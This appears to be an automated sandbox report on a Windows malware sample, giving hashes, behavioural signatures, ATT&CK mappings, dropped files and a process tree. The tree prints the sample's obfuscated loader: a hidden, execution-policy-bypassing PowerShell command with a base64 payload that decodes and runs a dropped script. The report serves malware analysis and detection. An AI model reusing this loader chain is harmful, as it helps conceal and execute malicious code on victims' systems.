11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158

General

Target

11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe
Size

1.9MB
MD5

f3c7cc02bf76362489b0fe8c35a9865c
SHA1

10319b1e54c0ab57d022d3f3c72adc36dd21e578
SHA256

11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158
SHA512

19e252faea4402ef26204e3e6967ffcfafa59ff123a72f404e2963356ad534840000dcb6c351b3840c2497945c33833659b8625008aa66084478ce346b401521
SSDEEP

24576:CMiCjNw14VaeynmsBBCA73pvxnCgQ8pS7du+Ec0xMke8JsU3AoUqqII+ke5F:JiCjNnVaeyPBBZQnPqqII+ke5F

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2932	powershell.exe
2896	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2896	powershell.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 2836	2708	11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe	32
PID 2708 wrote to memory of 2836	2708	11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe	32
PID 2708 wrote to memory of 2836	2708	11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe	32
PID 2836 wrote to memory of 2896	2836	cmd.exe	33
PID 2836 wrote to memory of 2896	2836	cmd.exe	33
PID 2836 wrote to memory of 2896	2836	cmd.exe	33
PID 2896 wrote to memory of 2932	2896	powershell.exe	34
PID 2896 wrote to memory of 2932	2896	powershell.exe	34
PID 2896 wrote to memory of 2932	2896	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe
"C:\Users\Admin\AppData\Local\Temp\11f4252eb95a7e0bfbef4d8e3da93450abf2bbb9b97b93f49aa28cbb76dc1158.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% && powershell -ExecutionPolicy Bypass -win hidden -e JABjAG8AbQBtAGEAbgBkAD0AZwBjACAAJABlAG4AdgA6AHQAbQBwAFwAXABNAGkAYwByAG8AcwBvAGYAdABTAGUAcgB2AGkAYwBlAEMAcgBlAGEAdABpAG8AbgAuAHAAcwAxAA0ACgBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAbwBtAG0AYQBuAGQAKQApACAAfAAgAGkAZQB4AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -win hidden -e JABjAG8AbQBtAGEAbgBkAD0AZwBjACAAJABlAG4AdgA6AHQAbQBwAFwAXABNAGkAYwByAG8AcwBvAGYAdABTAGUAcgB2AGkAYwBlAEMAcgBlAGEAdABpAG8AbgAuAHAAcwAxAA0ACgBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAbwBtAG0AYQBuAGQAKQApACAAfAAgAGkAZQB4AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -win hidden -c echo I Am Running
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceCreation.ps1

Filesize
109KB

MD5
327e0ca70e25c12a72ef70d7f8b0e31f

SHA1
53ba1fd74d073032768329d6aef18e9175a7a335

SHA256
240d9e25d72d9e2dc57767f863e322dde7083e733c6f7fbeb0596dec924627f5

SHA512
34df661350290e473943a8fe3527bb6c34b0cb36daf8be9753416edd3729a70ccc3eb0682eb7d16b72bb322b37e42e21a805ce5b2b2a26b83378f829ba944758

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P47W8MFLA4OU8E2903DR.temp

Filesize
7KB

MD5
50e027d9387f8109c403b89bf6f8c8c3

SHA1
e90ea74ab45233ad06bad63628484a73281eb9f0

SHA256
ac4f370f1647161c850ea426ff917b302f757956ddb1dc334427de98b575f4ba

SHA512
94bc0c37731dd9b7ee0c9efb4464ba81a3a70fc759cd7589ec0bca5cfa60957425ff76a9546620a87885fdea91b933b1203cb2b115a4d969e4e5d0aa3837ce0d

Download Submit
memory/2708-18-0x0000000000400000-0x000000000051B000-memory.dmp

Filesize
1.1MB

Download
memory/2896-5-0x000007FEF54DE000-0x000007FEF54DF000-memory.dmp

Filesize
4KB

Download
memory/2896-6-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2896-7-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2896-8-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2896-9-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2896-10-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2896-17-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing